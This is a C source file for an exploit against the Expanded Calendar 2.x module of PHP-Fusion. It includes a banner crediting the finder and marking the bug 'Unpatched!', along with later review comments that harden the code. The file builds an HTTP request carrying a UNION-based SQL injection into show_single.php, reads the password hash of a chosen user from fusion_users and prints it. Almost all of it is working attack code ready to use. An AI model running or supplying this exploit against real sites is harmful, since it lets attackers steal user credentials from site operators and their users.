/********************************************************
* Expanded Calendar 2.x (PHP-Fusion module) *
* User pass disclosure exploit *
* Found by Matrix86 of Rbt-4 Crew *
* Site: www.rbt-4.net *
* Mail: info[at]rbt-4[dot]net *
*********************************************************
* Bug found in *
* /infusions/calendar_events_panel/show_single.php *
* Line: *
* 27 *
* Vulnerability type: Sql injection *
* Unpatched! *
********************************************************/
#include <netdb.h>
#include <sys/types.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <sys/socket.h>
#include <stdio.h>
#include <time.h>
#include <errno.h>
#include <regex.h>
#include <stdlib.h>
#include <signal.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>
#define PORT 80 /* TCP port the HTTP request is sent to; not configurable from argv */
#define N_BUF 2048 /* NOTE(review): not referenced anywhere in this file */
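/*
 * Print an error message to stderr and terminate the process.
 *
 * text: message printed after the "Error: " prefix; never modified, so the
 *       parameter is const-qualified (callers passing char * still compile).
 *
 * Never returns.  The exit status is kept at -1 (255 in a POSIX shell) so
 * scripts that already test `$?` against the old tool keep working.
 */
void stampaE(const char *text){
    fprintf(stderr, "Error: %s\n", text);
    exit(-1);
}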
/*
 * Print the tool's banner on stdout followed by a newline, then pause for
 * one second before returning.  The text is emitted byte-for-byte; note that
 * it is not the same as the file header (different contact address).
 */
void banner(){
    static const char text[] = "\n\n*********************************************************\n* Expanded Calendar 2.x (PHP-Fusion module) *\n* User pass disclosure exploit *\n* Found by Matrix86 of Rbt-4 Crew *\n* Site: www.rbt-4.net *\n* Mail: matrix86[at]rbt-4[dot]net *\n*********************************************************\n* Bug found in *\n* /infusions/calendar_events_panel/show_single.php *\n* Line: *\n* 27 *\n* Vulnerability type: Sql injection *\n* Unpatched! *\n*********************************************************";
    /* puts() appends the '\n' that the original fprintf("%s\n") produced. */
    puts(text);
    sleep(1);
}
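/*
 * Print the command-line synopsis to stderr and terminate the process.
 *
 * name: argv[0], shown in both the usage line and the example; never
 *       modified, hence const-qualified (callers passing char * still compile).
 *
 * Never returns; exit status is -1 (255 in a POSIX shell), unchanged from the
 * original tool.  Note the example path carries a trailing '/': the request
 * built by main() appends the script name directly to it.
 */
void usage(const char *name){
    fprintf(stderr, "Usage: %s [site] [path] [user_id]\nExample: %s localhost /php-fusion/ 1\n\n", name, name);
    exit(-1);
}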
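/*
 * Write every byte of p[0..n) to fd, retrying on EINTR and on short sends.
 * Returns 0 on success, -1 (errno set) on failure.
 */
static int send_all(int fd, const char *p, size_t n){
    while (n > 0) {
        ssize_t w = send(fd, p, n, 0);
        if (w < 0) {
            if (errno == EINTR) continue;
            return -1;
        }
        p += w;
        n -= (size_t)w;
    }
    return 0;
}

/*
 * Read fd to EOF into a malloc'd buffer that grows by doubling up to cap_max
 * bytes; reading simply stops once the cap is full, so a hostile or huge
 * reply cannot exhaust memory.  On success stores the buffer in *out (caller
 * frees) and returns its length; returns -1 on a read or allocation error
 * (nothing is stored in *out).  The data is NOT NUL-terminated and may
 * contain NUL bytes.
 */
static ssize_t read_response(int fd, char **out, size_t cap_max){
    size_t cap = 16384, len = 0;
    char *buf = malloc(cap);
    if (buf == NULL) return -1;
    for (;;) {
        if (len == cap) {
            if (cap >= cap_max) break;  /* hard limit reached: stop reading */
            size_t ncap = (cap * 2 > cap_max) ? cap_max : cap * 2;
            char *tmp = realloc(buf, ncap);
            if (tmp == NULL) { free(buf); return -1; }
            buf = tmp;
            cap = ncap;
        }
        ssize_t r = read(fd, buf + len, cap - len);
        if (r < 0) {
            if (errno == EINTR) continue;
            free(buf);
            return -1;
        }
        if (r == 0) break;
        len += (size_t)r;
    }
    *out = buf;
    return (ssize_t)len;
}

/*
 * Binary-safe search for needle (a C string) inside hay[0..n).  Unlike
 * strstr() it keeps going past NUL bytes in the reply.  Returns a pointer to
 * the first occurrence, or NULL.
 */
static const char *find_bytes(const char *hay, size_t n, const char *needle){
    size_t m = strlen(needle);
    if (m == 0 || n < m) return NULL;
    for (size_t i = 0; i + m <= n; i++) {
        if (memcmp(hay + i, needle, m) == 0) return hay + i;
    }
    return NULL;
}

/*
 * Entry point.  argv[1] = host, argv[2] = web root path (e.g. "/php-fusion/"),
 * argv[3] = numeric user_id to look up.
 *
 * Resolves the host, sends one HTTP/1.0 GET whose query string carries the
 * UNION injection into show_single.php, reads the whole reply, then looks
 * for the HTML marker the page prints directly in front of the selected
 * column and prints the HASH_LEN characters that follow it (the target's
 * password hash).  Prints "Sorry...Bug Fixed!" when the marker is absent.
 * Exit status is 0 unless stampaE()/usage() terminate the process early.
 *
 * Defects in the original version of this function that are fixed here:
 *  - `host` was an uninitialised char * written with strcpy (undefined
 *    behaviour / crash before any network I/O);
 *  - the request was built with unbounded strcat of argv[2]/argv[3] into a
 *    fixed buffer (stack overflow from the command line);
 *  - `buffer[nr] = 0` wrote one byte past the end whenever read() filled
 *    the buffer, and the 32-byte copy after a match could run past it;
 *  - the marker was searched one read() chunk at a time, so a marker split
 *    across two reads was reported as "Bug Fixed";
 *  - an AF_INET6 answer from gethostbyname() was fed to inet_pton(PF_INET),
 *    whose failure was ignored, so the tool connected to 0.0.0.0;
 *  - send() was not retried on short writes and SIGPIPE could kill the tool.
 */
int main(int argc,char *argv[]){
    enum { RESP_MAX = 8 * 1024 * 1024, HASH_LEN = 32 };
    /* HTML the vulnerable page emits right before the injected column; the
     * hash is the HASH_LEN bytes that follow it (the original hard-coded the
     * offset as 34 = strlen(marker)). */
    static const char marker[] = "<td colspan='2'><font size='4'><u>";
    /* Script path plus the UNION-based injection; user_id is appended. */
    static const char script[] = "infusions/calendar_events_panel/show_single.php?sel=-1/**/UNION/**/SELECT/**/0,0,user_password,0,0,0,0,0,0,0,0,0/**/FROM/**/fusion_users/**/WHERE/**/user_id=";
    char get[3000];
    struct hostent *he;
    struct sockaddr_in srv;
    const char *path, *sep, *hit;
    size_t plen;
    char *resp = NULL;
    ssize_t n;
    int sock, len;

    banner();
    if (argc < 4) usage(argv[0]);

    /* Only digits may reach the URL: argv[3] is sent verbatim. */
    if (argv[3][0] == '\0' || strspn(argv[3], "0123456789") != strlen(argv[3]))
        stampaE("user_id must be a non-negative integer.");

    /* The script name is appended directly to the path, so a trailing '/'
     * is required; add it when missing so "/php-fusion" also works. */
    path = argv[2];
    plen = strlen(path);
    sep = (plen == 0 || path[plen - 1] != '/') ? "/" : "";

    /* Bounded build of the whole request; same bytes as the old strcat chain. */
    len = snprintf(get, sizeof get,
                   "GET %s%s%s%s/* HTTP/1.0\r\n"
                   "User-Agent: Mozilla/5.0\r\n"
                   "Host: %s\r\n"
                   "Connection: Close\r\n\r\n",
                   path, sep, script, argv[3], argv[1]);
    if (len < 0 || (size_t)len >= sizeof get) stampaE("Request too long.");

    he = gethostbyname(argv[1]);
    if (he == NULL) stampaE("Unable to resolve host.");
    if (he->h_addr_list[0] == NULL) stampaE("Host not found.");
    /* The socket is AF_INET, so anything but an IPv4 answer is unusable. */
    if (he->h_addrtype != AF_INET || he->h_length != (int)sizeof srv.sin_addr)
        stampaE("Host did not resolve to an IPv4 address.");

    memset(&srv, 0, sizeof srv);
    srv.sin_family = AF_INET;
    srv.sin_port = htons(PORT);
    memcpy(&srv.sin_addr, he->h_addr_list[0], sizeof srv.sin_addr);

    /* A peer reset during send() must surface as an error, not as SIGPIPE. */
    signal(SIGPIPE, SIG_IGN);

    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock < 0) stampaE("Impossibile inizializzare socket!");
    if (connect(sock, (struct sockaddr *)&srv, sizeof srv) < 0)
        stampaE("Impossibile connettersi all'indirizzo");

    fprintf(stdout, "\nPacket:\n%s", get);
    /* Sending sql injection */
    if (send_all(sock, get, (size_t)len) < 0) stampaE("unable send data.");
    fprintf(stdout, "Working...");
    fflush(stdout);  /* no newline, so make the progress text visible now */

    n = read_response(sock, &resp, RESP_MAX);
    if (n < 0) stampaE("unable to read reply.");

    /* e.g. <table class='tbl' width='100%' id='table1'><tr><td colspan='2'><font size='4'><u>MD5</u> */
    hit = find_bytes(resp, (size_t)n, marker);
    if (hit == NULL) {
        fprintf(stdout, "\nSorry...Bug Fixed!\n");
    } else {
        const char *hash = hit + (sizeof marker - 1);
        size_t avail = (size_t)n - (size_t)(hash - resp);
        if (avail < HASH_LEN)
            fprintf(stdout, "\nMarker found but the reply ends before the hash.\n");
        else
            fprintf(stdout, "User password: %.*s\n", (int)HASH_LEN, hash);
    }

    free(resp);
    close(sock);
    return 0;
}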